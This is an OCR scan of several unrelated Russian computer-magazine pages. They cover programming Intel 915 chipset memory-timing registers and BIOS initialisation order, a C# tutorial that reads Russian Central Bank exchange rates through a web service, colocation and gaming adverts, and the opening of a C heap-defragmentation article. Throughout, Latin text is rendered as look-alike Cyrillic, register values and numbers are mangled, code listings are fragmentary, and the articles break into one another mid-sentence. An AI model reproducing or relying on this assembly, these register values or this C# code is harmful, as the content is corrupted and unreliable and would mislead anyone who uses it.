происходит обмен данными, который в зави- 
симости от конструктивных особенностей 
конфигурируемого контроллера может быть 
доступен как на запись/чтение, так и только 
на чтение. Под «регистром» здесь понимает- 
ся отнюдь не регистр процессора (типа ЕАХ), 
а регистр контролера. РІекоторые регистры 
отображаются на порты ввода/вывода (и тог- 
да с ними можно работать командами ІІМ/ОІІТ), 
некоторые — нет, поэтому с ними можно ра- 
ботать только через СР8Іт/СРСІт. 
Большинство регистров представляютсобой 
совокупность управляющих битов, поэтому, 
перед тем как что-то записывать в портСРСІт, 
мы, как правило, сперва должны прочитать 
текущее состояние чипсета, взвести/опус- 
тить нужные нам биты при помощи операций 
ОЯ и АІ\Ю, после чего затолкать обновлен- 
ный регистр на место (однако, если текущее 
состояние нас не интересует, выполнять опе- 
рацию чтения совершенно не обязательно). 



□еѵісе 2_Рапде_ 
Оеѵісе 1_Папде_ 
Оеѵісе 0 Папае 



Оеѵісе 0 ММІо Яедізіегз: 
(О) МСН СопІгоІ 



ТЬегтаІ Зепзог РЗВ Апаіод 
Сопігоіз (Рсотр+)СН 0/1 Апаіод Сопігоіз 
ОН 0/1 Тітіпд Сопігоіз 
СЬ 0/1 Огапігаііоп Агѵііег 
Сопігоіз 



ОлС 

В частности, регистр 1141т северного моста 
чипсета ІпіеІ 91 5 управляет таймингами ЭЭЯ- 
памяти и делает он это с помощью своих би- 
тов, комбинация которых задает то или иное 
состояние ЭЯАМ-контроллера. Конкретные 
значения приведены в таблице 1, которую 
можно найти на 102 странице оригинально- 
го руководства: іпіеі.сот/сіезіап/сітірзеіз/ 

сІа1азІгІ5/301467.ІтІт. 

Таким образом, чтобы настроить память 
на максимальную производительность, 
необходимо занести в регистр 1141т число 
1 0000000000001 ОООООООООЬ (или 4002001т в 
шестнадцатеричном виде), что на языке ас- 
семблера делается так: 



Описание самих регистров можно най- 
ти в документации на северный и южный 
мосты чипсета. Где-то там будет раздел 
«РСІ Сопіідигаііоп Яедізіегз», «Яедізіегз 
Эезсгірііоп» или что-то в этом роде. 



памяти 


і, игнорируя информацию, за- 


писанную в $РО (только для Іпіеі 91 5) 


; 1 1 4П — 


регистр чипеста, управляющий 


; ЭЯАМ-контроллером 


тоѵ 


еах, 1 141т 


тоѵ 


сіх, 0СР8ІТ ;РСІ-порт 


оіД 


сіх, еах ; выбираем регистр 


тоѵ 


сіх, ОСРСІт; РСІ-порт (данные) 


Витаем содержимое регистра 1 141т 


іп 


еах, сіх 



; конфигурируем таймиги памяти 
омі 

(То(О)МЫН) 




> РІазИ-ВІОЗ, подключенный к южному мосту 
чипсета ІпіеІ 91 5 через шину І_РС 











































ог еах, 4002006 

; записываем регистр чипсета 

■■н 



О Заключение 

Общаться с оборудованием на «железном» уровне безумно 



Соіосаііоп 

Размещение оборудования в Москве 



интересно, но чрезвычайно утомительно и сложно. Прежде 
чем контроллер оперативной памяти «заведется», предсто- 
ит проделать немало работы и тщательно прочитать поряд- 
ка тысячи страниц документации, поскольку любая пропу- 
щенная мелочь может пустить все под откос. Положение 
усугубляется полным отсутствием отладочных средств, что 
дисциплинирует и учит искать ошибки «глазами». 

Совет: прежде чем писать свой мини-ВІОЗ, выводящий на 
экран зеленый травянистый семилистник под мелодию 
«семь-сорок», раздающуюся из спикера, скачай готовую 
прошивку и дизассемблируй Ьооі-блок, разобравшись, как 
он работает. Ты увидишь много обращений к портам, часть 
из которых удается расшифровать с помощью документа- 
ции на чипсет, часть — обратившись к описанию остальных 
контроллеров и микросхем, установленных на плате. 

Фра гмен т прошивки АМІ-ВІО$ 



ризб Ьр 


тоѵ 


Ьр, зр 


зиЬ 


ШИ 


тоѵ 




тоѵ 


ВМНМііШіИІ 


тоѵ 


Ьуіе ріг [СІІ-6], Т 


тоѵ 


Ьуіе ріг [бі-5], 'В' 


тоѵ 


Ьуіе ріг [бі-4], Т 


тоѵ 




тоѵ 


Ьуіе ріг Гбі-21, '3' 


тоѵ Ьуіеріг [бі-1], 'С 

ризб Ьх 

ризб зі 


ог 


зі, зі 


тоѵ 


ах, [бі+8] 


тоѵ 


бх, [Ьх+зіч-20б] 


Іезі 


бх, бх 


* 


збогііос А9ВОВ 



В конечном счете мы создадим свой Ьооі-блок, ассемблиру- 
ем и, воткнув в программатор РІ_А5Н-ВІОЗ, зальем туда свое 
творение (предварительно сохранив оригинальную прошив- 
ку). Не стоит надеяться, что материнская плата «проглотит» 



Что такое размещение сервера (со-Іосаііоп) ? 
Со-Іосаііоп — это размещение Вашего сервера на 
площадке (в дата-центре) провайдера, в 19" стойке 
(гаек). Услуги по размещению сервера (соііосаііоп), 
включают наличие основного и резервного электро- 
питания, контроля температурно-влажностного 
режима, системы автоматического газового пожаро- 
тушения, ограничение доступа к Вашему оборудова- 
нию, наличие быстрых основного и резервного 
интренет-каналов, сохранность Ваших серверов, 
и опционально — услуги по администрированию 
серверов. 

Вам либо будет предоставлен в аренду Интернет- 
канал гарантированной пропускной способности, 
либо будет предложено оплачивать трафик, при 
некоторых условиях трафик может быть бесплатный. 

Почему размещать оборудование у нас? 

— Мы размещаем оборудования в двух дата-центрах 
в Москве: дата-центре М9 и дата-центре СТЕК; 

— Мы обеспечиваем круглосуточный мониторинг 
работоспособности Ваших серверов; 

— Мы обеспечиваем Вам доступ к оборудованию по 
предварительной заявке; 

— Мы предоставляем подключение на скорости от 
ІООтЬрз до ІСЬрз; 

— Мы окажем Вам помощь в решении проблем. 

Какие преимущества услуги размещения сервера ? 

Услуги по размещению серверов в дата-центрах 
включают множество преимуществ для владельцев 
сайтов, таких, как: 

— Полный контроль над серверами; 

— Для серверов специальные условия хранения 
и функционирования; 



его с первого раза. Будет только черный экран, не реагирую- 
щий на клавиатуру — и все. Даже курсора не будет. Попробуй 
угадай, в каком месте сидит ошибка! Но ведь только так про- 
граммист из юноши превращается в настоящего мужчину, в 
смысле хакера. После недели-другой непрекращающихся 
мытарств мы, наверное, сможем оценить, каково приходи- 
лось нашим предкам, дырявящим перфокарты и совсем не- 
знакомым с понятием интерактивной отладки. ИЛ 



— Серверы настолько быстры и производительны, 
как вы захотите, вы можете обновлять серверы; 

— Уменьшенная зависимость от услуг провайдеров, 
большинство задач администрирования и настроек 
можно проводить удаленно, значительная гибкость; 

— Возможность использовать имеющиеся серверы; 

— Построение собственных отказоустойчивых 
решений. 







ССЮІІМО] 
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Управление таймигами памяти через регистр 1 14И северного моста чипсета Іп(еІ 91 5 (на других чипсетах номер регистра и 
назначение бит с вероятностью, близкой к единице, будут совсем другими, поэтому данная таблица приводится толькот как пример) 



биты 


доступ 


значение по умолчанию 


назначение 


31:24 


- 


— 


Зарезервированы. 


23:20 


Р/ѴѴ 


9 


Величина іРАЗ (она же ОРАМ Ргесііагде Эеіау, она же Асііѵе іо Ргесііагде Оеіау, она 
же Ргесііагде ѴѴаіі Зіаіе, она же Роѵѵ Асііѵе Оеіау, она же Роѵѵ Ргесііагде Оеіау) устанав- 
ливает минимальный промежуток времени между открытием/закрытием одной ЭРАМ- 
страницы. 

Значения от 0 до 3 зарезервированы; 

Значения от 4 до 1 5 — время в тактах. 


19 


РО 


0 


іРАЗ МАХ — максимальный промежуток времени, в течение которого ЭРАМ-страница 
может оставаться открытой, и, если контроллер не закроет ее, произойдет Рапіс 
Реігезіі (экстренное обновление), сопровождаемое закрытием всех страниц во 
всех банках. 

В данном чипсете этот регистр доступен только на чтение, то есть управление іРАЗ 
МАХ не реализовано и составляет 1 20 наносекунд. 


18:10 


— 


— 


Зарезервированы. 


09:08 


Р/ѴѴ 


01Ь 


Величина іСІ_, более известная под именем САЗ# Ьаіепсу, задает количество тактов 
между отправкой ООР-микросхеме команды чтения (не записи!) и сбросом первой порции 
данных на шину, при этом ОРАМ-страница должна быть заблаговременно открыта, за 
что отвечает тайминг іРСО. 


значение регистра 00К ІСІ., такты 00К21СІ., такты 

00Ь 3 5 

01 Ь 2,5 4ѵѵ 

10Ь 2 3 

11 зарезервированы 


07 


— 


— 


Зарезервирован. 


06:04 


Р/ѴѴ 


оюь 


Величина іРСО, также называемая РАЗ# іо САЗ# Оеіау или Асііѵе іо СМО, определяет время 
открытия ОРАМ-страницы, в процессе которого со строки конденсаторов считывается заряд 
и заносится в буфер статической памяти, локально обрабатывающий все последующие обращения. 

значение регистра ІКСО, такты 

000Ь 2 

001 Ь 3 

ОЮЬ 4 

011Ь 5 

ЮОЬ 
101Ь 

110Ь зарезервированы 

1 1 1 Ь 


3 


— 


— 


Зарезервирован. 


2:0 


Р/ѴѴ 


оюь 


Величина іРР (она же РАЗ# Ргесііагде Оеіау, она же Ргесііагде іо асііѵе) определяет время 
закрытия ОРАМ-страницы, в процессе которого происходит возврат данных в банк памяти 
и его перезарядка. Во время перезарядки банк недоступен, но доступны все остальные банки 
(большинство ООР-модулей содержит четыре таких банка). Банк закрывается на 
перезарядку всякий раз, когда происходит обращение к другой странице из этого же 
самого банка. 


значение регистра ГОР, такты 

000Ь 2 

001 Ь 3 

ОЮЬ 4 

01 1Ь 5 

ЮОЬ 
ЮІЬ 

ІЮЬ зарезервированы 

1 1 1 Ь 
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ПОРЯДОК ИНИЦИАЛИЗАЦИИ ОБОРУДОВАНИЯ 



Порядок инициализации оборудования не вы- 
сечен на камне и допускает довольно большие 
вольности, однако определенные традиции и 
нормы приличия все-таки нужно соблюдать. 
Материнские платы от ЕРОХ выгодно отлича- 
ются тем, что имеют 2-разрядный сегментный 
индикатор, отображающий ход загрузки, что 
облегчает диагностику поломки (если таковая 
есть) и упрощает дизассемблирование ВІ05, 
поскольку. . . код, отображаемый на индикато- 
ре, в листинге присутствует в виде констан- 
ты, расшифровку значения которой можно 
найти в руководстве в приложении Е. Лучших 
комментариев к листингу, пожалуй, и не при- 
думаешь! 

На остальных материнских платах порядок 
инициализации оборудования не сильно от- 
личается от ЕРОХ'а, и все происходит прибли- 
зительно следующим образом: 

тест СМ05 на чтение/запись; 
отключение теневой РАМ; 
инициализация базовых регистров чипсета; 
чтение информации из 8РЭ и инициализа- 
ция ОРАМ-контроллера; 
распаковка сжатого ВІ08 в оперативную 
память; 

копирование ВІ08 в теневую РАМ в сегмен- 
ты Е0006 и РОООН; 

инициализация интерфейса 8042 (интегри- 
рованного в южный мост); 
запуск самотестирования 8042; 
детектирование микросхемы РІ_А8Н-РОМ; 
загрузка процедуры «прожига» РІ_А8РІ 
в сегмент Р0006 (для поддержки ЭМІ & Е8СО); 
установка всех регистров чипсета в значе- 
ния по умолчанию (берутся из ВІ08); 
детектирование типа ЦП; 
инициализация таблицы векторов преры- 
ваний; 

считывание установок СМ08 в стек ВІ08'а; 
построение карты ресурсов для РСІ- и Р&Р- 
устройств; 

инициализация тактового генератора; 
сканирование всех устройств, подключен- 
ных к РСІ-шине; 



назначение устройствам ІРО и портов 
ввода/вывода; 

поиск видеокарты и отображение ѴОА ВІ08 
на сегмент С000Н; 

инициализация буфера клавиатуры для 
вектора ІЫТ 09Н; 

инициализация внутренних МТРР-регист- 
ров ЦП для отображения памяти 0-640 Кб; 
инициализация АРІС-контроллера; 
установка регистров чипсета в соответс- 
твии с настройками СМ08; 

инициализация интегрированного ЮЕ-кон- 
троллера; 

измерение тактовой частоты ЦП; 
вызов ѴЮЕ0-ВІ08; 

вывод на экран информации о типе ЦП, 
тактовой частоте, логотипа ВІ08 и т.д.; 
сброс клавиатуры; 

тест битовой маски контроллера прерыва- 
ний 8259 для канала 1 ; 
тест битовой маски контроллера прерыва- 
ний 8259 для канала 2; 
первичная инициализация шины 118В; 
тестирование и очистка памяти; 
готовность выйти в ВІ08 8еіир по нажатию 
<ОЕІ_>; 

инициализация Р8/2-мыши; 
инициализация и выделение ресурсов 
интегрированным СОМ и І_РТ-портам; 
инициализация привода гибких дисков; 
детектирование и инициализация ЮЕ-при- 
водов {НОВ, 1-8120, 2ІР, СОРОМ); 
детектирование и инициализация неинтег- 
рированных СОМ/І_РТ-портов; 
перепрограммирование шрифтов для выво- 
да ЕРА-логотипа в текстовом режиме; 
вывод ЕРА-логотипа; 

вызов Носк-процедуры менеджера энерго- 
питания; 

восстановление шрифтов, используемых 
для вывода ЕРА-логотипа; 
запрос пароля (если загрузка компьютера 
защищена паролем); 

запись всех данных из стека ВІ08 обратно 
в СМ08; 

инициализация загрузочных устройств Р&Р; 



финальная инициализация шины 118В; 
инициализация АРСІ-таблицы на вершине 
памяти; 

поиск І8А-устройств (если есть эта рухлядь) 
и вызов их ВІ08'ов; 

финальное распределение между І8А и РСІ- 
устройствами; 

финальная инициализация чипсета; 
финальная инициализация менеджера 
энергопитания; 

очистка экрана и вывод таблицы с инфор- 
мацией о конфигурации всех устройств; 
инициализация клавиатурных индикаторов 
и установка скорости автоповтора; 
построение МР-таблицы; 
построение и обновление Е8СО-таблицы; 
установка века в СМ08; 
загрузка даты/времени в область данных 
ВІ08; 

построение таблицы маршрутизации аппа- 
ратных прерываний М8ІЯО; 
попытка загрузки с загрузочного носителя 
(вызов прерывания ІІ\ІТ 19Н); 
на этом ВІ08 прекращает свою работу и 
передает управление Ьооі-сектору; 




> Серверный мост чипсета, несущий на своем 
борту важнейшие устройства (такие, напри- 
мер, как контроллер памяти), подключается 
к процессору через РСІ-шину 
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Веб-сервис 
для КПК 






КПК, КОММУНИКАТОРЫ, СМАРТФОНЫ... ЭТИ ДЕВАИСЬІ ПОСТЕПЕННО СТАНОВЯТСЯ РАБОЧИМИ ИНСТРУМЕНТАк 
КАК Б И 3 Н ЁСМЁНА, ТАК И СТУДЕНТА. НЕСМОТРЯ НА ат.-КВАЛИФИЦИРОВАННЬІХ РАЗРАБОТЧИКОВ ^бФТА ДЛЯ 
ЭТИХ УСТРОЙСТВ' ^МАТ^^Т^'Н^ША;ЁЩЕ НЕ ЗАНЯТА. СЕГОДНЯ^ практический прйм'ерС 

И СП ОАьабВАН И'Я'ДВУХТІ Е РС ПЕК-Тй В Н Ы X ТЕХнбгіЙОИЙ щЫЕТ'Щ^ в к И^Её^ДруІСЕЗ:'' 



ЮЗАЕМ ВЕБ-СЛУЖБУ СЕРВЕРА ЦБ РФ НА .МЕТ 
СОМРАСТ РВАМЕѴѴОВК 




ы займемся написанием прило- 
жения, работающего на базе ОС 
ѴѴіпсІоѵѵз МоЬіІе под платформой 
.ЫЕТ Соплрасі Ргатеѵѵогк и использующего 
веб-службы сервера Центробанка РФ для по- 
лучения различной информации, предостав- 
ляемой ЦБ разработчикам для последующей 
обработки и донесения до конечного потре- 
бителя. Писать будем, соответственно, на С#, 
используя ѴізиаІ ЗЮбіо.ЫЕТ. Я постараюсь 
вкратце рассказать, что же такое веб-служ- 
бы, зачем они нужны и как их использовать 
в мобильном приложении так, чтобы работа 
программы не вызывала спазмов желудка. 
Итак, поехали. Начнем с основ. 

□ Почему .ЫЕТСР? 

Думаю, для тебя не будет откровением, если 
я скажу, что на данный момент на рынке мо- 
бильных устройств доминируют КПК на базе 
ѴѴіпсІоѵѵз МоЬіІе. Их коммуникационные воз- 



можности развиваются, и из просто крутых 
блокнотов они переходят в разряд серьез- 
ных устройств, способных предоставлять 
доступ к разного рода информации. Такие 
технологии, как ВІиеіооФ и ѴѴі-РІ, позво- 
ляют на ходу подключаться к всемирной 
сети и делаюттакую машинку поистине не- 
заменимым инструментом. Но если с выбо- 
ром ОС для нашей проги все более-менее 
понятно, то у многих противников творчес- 
тва Місгозоіі возникнет вопрос: «А зачем 
писать софт для платформы .ІЧЕТ СЕ?» Не 
хочу лишний раз вдаваться в рассуждения 
по этому поводу, поэтому оставлю это лю- 
бителям священных войн, а сам напомню 
вкратце, что вообще собой представляет 
технология .ІЧЕТ СЕ. 

Платформа .МЕТ Сотрасі Ргатеѵѵогк являет- 
ся адаптированной для мобильных устройств 
версией платформы .МЕТ Ргатеѵѵогк. Появле- 
ние обеих платформ вызвано стремлением 



компании Місгозоіі обеспечить упрощение 
написания мультиплатформенного кода, спо- 
собного выполняться под любой ОС и на лю- 
бом оборудовании. Суть программирования 
под .ІЧЕТ Ргатеѵѵогк заключается в написании 
кода на одном (или нескольких) .ІЧЕТ-сов- 
местимых языках, который компилируется 
в так называемый управляемый код (М5ІІ_ — 
Місгозо^ Іпіегтебіаіе Бапдиаде). Этот код, в 
свою очередь, компилируется средой .ІЧЕТ 
Ргатеѵѵогк в машинно-зависимые инструкции 
уже при запуске программы на конкретной 
рабочей станции (девайсе) и поэтому может 
быть запущен на любой программно-аппарат- 
ной платформе, на которой установлена сре- 
да .ИЕТ. Естественно, наличиеустановленной 
среды выполнения .ІЧЕТ Ргатеѵѵогк необходи- 
мо для запуска подобных приложений. 

Код, полученный при компиляции, называет- 
ся управляемым (тападеб), потому что его 
выполнение полностью контролируется инф- 
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> Студия с запущенным эмулятором ѴѴіпсІоѵѵз МоЬіІе 



Курсы калют ЦБ РЯ 4|( 22:42 





Валюте |Шт Курс 


► 


Аестра№й№№ доллар 


1 


20,1101 




Фунт стерлі#г 0 в 


1 


49,7432 




Белорусский рубль 


1000 


12,6933 




Датская крона 


10 


45,7412 




Доллар США 


1 


27,0079 




Евро 


1 


34,1407 




исландская крона 


100 


36,5367 




Казахский теіке 


100 


22,4772 




Канадский доллар 


1 


24,0991 




Китайский кинь 


10 


33,6946 




Норв&йскзя крона 


10 


43,5613 



Курсы мл ют курса доллара 



Последняя публикация: 10/6/2006 



Мено 



> Наша программа в действии 



раструктурой ,І\ІЕТ. Кроме того, при запуске 
приложения компилируется не сразу весь 
код М8ІІ_, а лишь используемые в конкрет- 
ный момент методы. Ехе-файлы, полученные 
при первичной компиляции, имеют в своей 
структуре секцию, указывающую на то, что 
управление выполнением приложения долж- 
но передаваться среде .МЕТ. Стандартный за- 
грузчик ѴѴіпсІоѵѵз МоЬіІе не может определять 
эту секцию, поэтому он модифицируется при 
установке на машину .МЕТ СЕ. 

По некоторым данным, до 80% средств, 
затраченных на разработку компанией 
Місгозоф идет на развитие .МЕТ. Учитывая 
влияние М3, а также тот факт, что ѴѴіпсІоѵѵз 
Ѵізіа будет иметь полную поддержку .МЕТ, 
становится очевидно, что программирова- 
ние под эту платформу очень востребовано 
на рынке разработки пользовательского ПО. 
Успех .МЕТ во многом обязан удобству рабо- 
ты с ѴізиаІ 8іисІіо.І\ІЕТ. Кроме того, библио- 
тека .МЕТ насчитывает огромное количество 
классов для работы с ХМІ_ и веб-службами. 
Еще одним доводом является наличие в ѴізиаІ 
БШсНо.ЫЕТ средств разработки и отладки 
ПО для платформ ѴѴіпсІоѵѵз СЕ и Роскеі РС, 
включая эмулятор. Тебя наверняка поразит 
простота, с которой можно использовать веб- 
службы, работая в этой среде. 

О Что же это за технология? 

Технология веб-служб или веб-сервисов 
(ѵѵеЬ-зегѵісез) призвана обеспечить доступ 
через интернет к различным приложениям и 
их совместное использование. Причем все 
это происходиттаким образом, будто все при- 
ложения расположены нелокальной машине. 
Функционирование веб-служб базируется 
на языке ХМІ_ с присущей ему межплатфор- 
менностью и универсальностью. Появление 
веб-служб обусловлено тем, что настольные 
и веб-приложения стали схожи по функцио- 
налу, и зачастую программы используют ин- 



тернет для передачи и загрузки разного рода 
информации. 

Потребителями веб-служб являются не ко- 
нечные пользователи, а программный код, 
разрабатываемый кодерами. По сути, потре- 
бителем является приложение, в исходном 
коде которого описывается взаимодействие 
программы с веб-сервисом. Если опустить 
технические детали реализации взаимодейс- 
твия, то можно сказать, что при использова- 
нии (на этапе разработки потребителя) веб- 
служб средой ѴізиаІ ЗШсІіо генерируется так 
называемый прокси-класс, обеспечивающий 
из исходного кода программы доступ к мето- 
дам и свойствам веб-службы, как к методам и 
свойствам локального класса. Другими сло- 
вами, класс со всеми его методами, создан- 
ный и развернутый на удаленном сервере, 
доступен на локальной машине. Я не буду 
расписывать, каким образом осуществляет- 
ся обмен данными между сервером и клиен- 
том, поскольку информации по этому вопросу 
предостаточно. Скажу лишь, что данные пе- 
редаются от клиента к серверу и обратно не 
в двоичном формате, а в текстовом. Формат 
передаваемых данных основывается на ХМІ_, 
чем и обуславливается тотфакт, что не важно, 
на какой аппаратно-программной платформе 
крутится наш код. Рекомендую ознакомиться 
с книжкой Алекса Феррара « Программирова- 
ние ѵѵеЬ-сервисов для ,І\ІЕТ». 

Чтобы тебе была понятнее идея использова- 
ния веб-сервисов, рассмотрим взаимодейс- 
твие нашего приложения с сервером ЦБ. На 
серваке хранится информация о курсах ва- 
лют, динамике их изменения и прочая инфа, 
определяющаяся спецификой деятельности 
этой бравой конторы. 

Для того чтобы мы могли получать доступ к 
этим данным, ребята из ЦБ написали веб-сер- 
вис, позволяющий нам уже из своего кода вы- 
зывать методы, которые описаны на сервере 
и служат для получения и обработки этой ин- 



формации. Чтобы начать работу, нужно доба- 
вить референс на веб-службу: 



ІЬНрѴ/ѵѵѵѵѵѵ.сЬг.ги/РаіІуІпЬѴѴеЬЗегѵ/РаіІуІНо.азтхІ 



Если откроешь эту ссылку в браузере, то 
увидишь описание методов некоего класса 
ОаіІуІпТо. Этот документ автоматически был 
сгенерирован, когда программисты ЦБ ском- 
пилировали и запустили веб-службу на сер- 
вере. Описание содержит тип возвращаемых 
данных и назначение конкретного метода. 
При добавлении референса в проект среда 
автоматически генерирует прокси-класс 
ЭаіІуІпіоО, с которым мы и будем работать. 
Также необходимо подключить пространство 
имен: 



//здесь сЬгТ — название нашего проекта| 

изіпд с Ь Л. г и . с Ь г . 



Теперь можно использовать ЭаіІуІпТо как 
обычный локальный класс: 



//создаем экземпляр прокси-класса| 
Раііуіпіо сіі = пеѵѵ РаіІуІгЧоОІ^Д^|^| 



□ Пишем код 

После изучения методов, предоставляемых 
нам классом ЭаіІуІпТо() для доступа к необхо- 
димой инфе, приступим к непосредственной 
разработке. 

Создаем новый С# — проект типа «8тагі 
Эеѵісе Арріісаііоп», платформу — Роскеі РС, 
тип приложения — ѴѴіпсІоѵѵз Арріісаііоп. 
Разместим на форме две закладки, на одной 
из которых будет инфа о курсах, на другой 
— об их динамике. Для отображения дан- 
ных нам понадобится два контрола ЭаІаСігісІ. 
Добавим также меню «Загрузка» с пунктами 
«Курсы валют» и «Динамика курсов». Осталь- 
ные возможности кпроге добавишьсам :). Для 
получения соответствующих данных исполь- 
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> Описание веб-службы ЦБ 




зуются следующие методы: ОеЮигзОпБаіе — метод, воз- 
вращающий Ба^аЗеі с текущими курсами валют. Прини- 
мает в качестве параметратекущуюдату.ОеЮигзОупатіс 
— метод, возвращающий ОаіаЗеі с динамикой курса 
какой-то конкретной валюте. Принимает в качестве па- 
раметров дату начала и конца изменения курса, а также 
код валюты. 

При выборе действия в меню будем вызывать функцию 
БоасІіпдОаіа, код которой можно посмотреть ниже. 



Код функции ЬоагііпдРаіаД 

ргіѵаіе ѵоісі ЬоасІіпдРаІа(РаІа(ЗпсІТагде1, іпі5егѵісеІ\ІитЬег)| 



Е 



ІаЬІеЗіуІе.ОгібСоІитпЗіуІез.СІеагО; 
І1 (Зегѵісѳ1\ІитЬег ==У^Щ^ШвИк 



// показываем первую 

// начинаем асинхронный вызовметода^д ^"' ‘ ?' , ' ■ 
ГіапсІІе = бі.ВедіпОеіСиг50пРаІе(РаІеТіте.Моѵѵ,пиІІ,пиІІ);| 



іі (5егѵісеІ\ІитЬег==2) 



ШРадез.ЗѳІѳс^есІІпсІех=Ті^Д Й&ЖДу | ' 

// начинаем асинхронный вызов метода| 
ИапсіІѳ=сііБѳдіпСѳіСигзРупатіс(^^^И 
РаІеТіте.РагзеДехШохІ 
Ра1еТіте.Рагзе(1ѳх1Вох2Те)ЩД |д 




Само собой, неплохо бы привести этот код в блоке ігу и 
отлавливать исключения. Журнал не резиновый, поэто- 
му останавливаться на этом не будем. 

Как видишь, все элементарно, но есть один любопытный 
нюанс. Независимо от того, каким образом твой нала- 
донник подключен к интернету, время ожидания данных 
будет вполне ощутимо. Поэтому если ты не хочешь при 
нажатии кнопки «Загрузить» некоторое время лицезреть 
нереагирующую на действия пользователя прогу с «под- 
висшим» интерфейсом, то рекомендую использовать 
асинхронный вызов службы. Суть его в том, что обмен 
данными между сервером и КПК осуществляется как бы 
в отдельном потоке, предоставляя приложению возмож- 
ность обрабатывать другие события. Реализуется же 
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> Г рамотный учебник 
по веб-сервисам 



это за счет использования методов ВедіпОеіСигзОпОаіе 
и ВедіпѲеЮигзОупатіс вместо ОеіСигзОпОаіе и Оеі- 
СигзОупаппіс. Для того чтобы проверить, закончена 
ли загрузка данных, используется свойство НапсІІе. 
ІзСотрІеіесІ. Когда оно принимает значение Ігие, дан- 
ные можно обрабатывать и отображать. Я прицепил к 
форме таймер и каждую секунду тупо проверял значе- 
ние этого свойства. 



Ловим момент окончания загрузки данных| 

ргіѵаіе ѵоісі 1ітег1_Тіск(оЬіес1 зепсіег, ЕѵепІАгдз е)Д 



ІІ (ГіапсІІе.ІзСотрІеІесІ) 



//записываем полученные данные в наш Ра1а(3гісі| 
с!з=сІІ.ЕпсІСеіСигзОпРа1е(Ііап^Іе)'Д:‘ 



//код для преобразования и отображения данных 



//показываем, что идет загрузка данных| 
31а1изВагТех1=з1а1изВагТех1+щН|^ 




После того как получен ОаіаЗеі с запрошенными данными, 
их необходимо обработать таким образом, чтобы они нор- 
мально смотрелись на экране девайса. Как это сделать, ду- 
маю, разберешься сам. Намекну лишь, что придется поль- 
зоваться таблицами стилей для каждого столбца, который 
ты захочешь отображать. Рекомендую также взглянуть на 
исходник. 

□ Вместо заключения 

Как видишь, использование веб-сервисов при программи- 
ровании под .МЕТ СР не вызывает особых сложностей. Ты 
можешь самостоятельно расширить функциональность 
программки, которую мы с тобой сегодня наваяли, добавив 
в нее поддержку загрузки остальных данных с сервера ЦБ. 
Ценность данного примера заключается в том, что разра- 
ботка приложения, использующего другие веб-службы, не 
будет принципиально отличаться от процесса, который я 
постарался описать в этой статье. Т ак что ѴізиаІ Біисііо тебе 
в руки — и вперед, к покорению рынка софта для КПК . И-И 
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САМЕ5 

СОІМѴЕІЧТІОН 



РЕПОРТАЖ 
С КРУПНЕЙШЕЙ 
ЕВРОПЕЙСКОЙ 
ВЫСТАВКИ 

КИБЕРЖЕНЩИНА 
ТВОЕЙ МЕЧТЫ 

ЧТО ДУМАЮТ 
ДЕВУШКИ 
О ГЕРОИНЯХ 
СОВРЕМЕННЫХ 
ИГР? 

ТОМ СЦМСѴ'8 
КАШВОѴѴ 5ІХ 
ѴЕСАЗ 



РАЗРАБОТЧИКИ 

ИЗВЕСТНОГО 

ТАКТИЧЕСКОГО 

ШУТЕРА 

ОТПРАВИЛИ 

СПЕЦНАЗ В ГОРОД 

ГРЕХОВ 

КОМЕ: ТОТаГ| 
ѴѴАК - АЬЕХАИОЕК 

ОТ ГРЕЦИИ 
ДО ИНДИИ - 
ВЕЛИКИЙ ПОХОД 
АЛЕКСАНДРА 
МАКЕДОНСКОГО 



ПРЕВЬЮ: 

паѵѵп оУ ѴѴаг - 0агк ^ ги д Н , е * 0 г М'иМе-еаЛЬ 2 
БіхѴедаз, ТЬ и е ^!„ р Г о ЕѵоІиЫоп Зоссег 6, 

ТЬе м О^е 

ааіІгоасЫ, Ѵои аг ^ Я ' ДЛЯ драконов»,<<Герои 

ТЬЗ Ріа", < СИ ^!Гпения: Три^змерения уб-йс геа ”. 
«Место преступления, и «тачки», Раііеп 

СіѵСііу. Коте, Яезегу 0 О 9^ ^ 0го ріеат, 

і-огсів: «Другой МИР 'В вп ^ ог |с1 

°ГДго1-МНОГОЕ ДРУГОЕ 







В ЭТОМ, ЧЕТВЕРТОМ ПО СЧЕТУ ВЫПУСКЕ, МЫ РАССМОТРИМ ТРЮКИ, ТАК ИЛИ ИНАЧЕ СВЯЗАННЫЕ С ПАМЯТЬЮ: 
ПРОДЕФРАГМЕНТИРУЕМ КУЧУ, РАЗБЕРЕМСЯ, КАК ПРАВИЛЬНЕЕ ПЕРЕДАВАТЬ ПЕРЕМЕННЫЕ ПО ССЫЛКЕ ИЛИ ПО 
ЗНАЧЕНИЮ, КОГДА ИХ НУЖНО ИНИЦИАЛИЗИРОВАТЬ, А КОГДА — НЕТ. 




ри интенсивном использовании 
кучи может сложиться такая ситу- 

I ) ация, когда свободная память есть, 

но выделить ее не удается. Почему? Предста- 
вим себе, что мы имеем 1 00 Мб свободной па- 
мяти в непрерывном блоке. Выделяем 1 0 бло- 
ков по 10 Мб, а затем освобождаем их через 
один, после чего пытаемся выделить блок раз- 
мером в 20 Мб, но это не получится! Несмотря 
на 50 Мб свободной памяти, эта память раз- 
дроблена на множество мелких кусочков. Вот 
потому-то некоторые и рекомендуют перезаг- 
ружать ѴѴіпбоѵѵз хотя бы раз в месяц. 

Почему же менеджер кучи не дефрагменти- 
рует память, переупорядочив блоки? Да по- 
тому, что, получив указатель на выделенный 
блок памяти, программа приобретает в свое 
владение целый регион, с которым может де- 
лать все, что угодно. В частности, сохранять 
указатели на ячейки внутри блока. Но менед- 
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жер кучи ничего не знает об этих указателях и 
потому не может трогать память. 

А давай попробуем написать собственный 
дефрагментатор кучи! Это возможно (и сов- 
сем не сложно), если только наша программа 
придерживается определенных соглашений. 
В частности, адресует все ячейки внутри вы- 
деленного блока только через базовый ука- 
затель, который, в свою очередь, является 
указателем науказатель. Непонятно? Ничего, 
несколько наглядных листингов все объяс- 
нят. Вот классический пример использования 
кучи, делающий дефрагментацию динами- 
ческой памяти невозможной: 




сЬаг *р, х; іпі п; 

р = таІІос(ВІ_ОСК_5І2Е); 
х = р+п; 

1оо(х); 

Выделив блок памяти р, программа получа- 
ет указатель х, ссылающийся на некоторую 
ячейку внутри блока, и передает его функции 
Іоо, которая сохраняется в статической пе- 
ременной Ь, что делает блок р совершенно 
неперемещаемым, поскольку переменная Ь 
жестко привязана к своей ячейке памяти и ни- 
чего не знает про какие-то там блоки. 

А вот другой вариант той же программы: 

ѵоіаіііе сГіаг **р; іпі п; 

